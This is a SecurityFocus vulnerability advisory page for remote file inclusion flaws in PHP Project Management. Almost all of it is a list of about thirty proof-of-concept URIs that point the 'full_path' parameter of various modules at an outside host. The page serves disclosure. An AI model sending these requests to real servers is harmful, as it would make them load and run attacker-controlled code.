PHP Project Management Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/modules/certinfo/index.php?full_path=http://www.example2.com
http://www.example.com/modules/emails/index.php?full_path=http://www.example2.com
http://www.example.com/modules/events/index.php?full_path=http://www.example2.com
http://www.example.com/modules/fax/index.php?full_path=http://www.example2.com
http://www.example.com/modules/files/index.php?full_path=http://www.example2.com
http://www.example.com/modules/files/list.php?full_path=http://www.example2.com
http://www.example.com/modules/groupadm/index.php?full_path=http://www.example2.com
http://www.example.com/modules/history/index.php?full_path=http://www.example2.com
http://www.example.com/modules/info/index.php?full_path=http://www.example2.com
http://www.example.com/modules/log/index.php?full_path=http://www.example2.com
http://www.example.com/modules/mail/index.php?full_path=http://www.example2.com
http://www.example.com/modules/messages/index.php?full_path=http://www.example2.com
http://www.example.com/modules/organizations/index.php?full_path=http://www.example2.com
http://www.example.com/modules/phones/index.php?full_path=http://www.example2.com
http://www.example.com/modules/presence/index.php?full_path=http://www.example2.com
http://www.example.com/modules/projects/index.php?full_path=http://www.example2.com
http://www.example.com/modules/projects/summary.inc.php?full_path=http://www.example2.com
http://www.example.com/modules/projects/list.php?full_path=http://www.example2.com
http://www.example.com/modules/reports/index.php?full_path=http://www.example2.com
http://www.example.com/modules/search/index.php?full_path=http://www.example2.com
http://www.example.com/modules/snf/index.php?full_path=http://www.example2.com
http://www.example.com/modules/syslog/index.php?full_path=http://www.example2.com
http://www.example.com/modules/tasks/searchsimilar.php?full_path=http://www.example2.com
http://www.example.com/modules/tasks/index.php?full_path=http://www.example2.com
http://www.example.com/modules/tasks/summary.inc.php?full_path=http://www.example2.com
http://www.example.com/modules/useradm/index.php?full_path=http://www.example2.com
http://www.example.com/ajax/loadsplash.php?full_path=http://www.example2.com
http://www.example.com/blocks/birthday.php?full_path=http://www.example2.com
http://www.example.com/blocks/events.php?full_path=http://www.example2.com
http://www.example.com/blocks/help.php?full_path=http://www.example2.com


 

Privacy Statement
Copyright 2010, SecurityFocus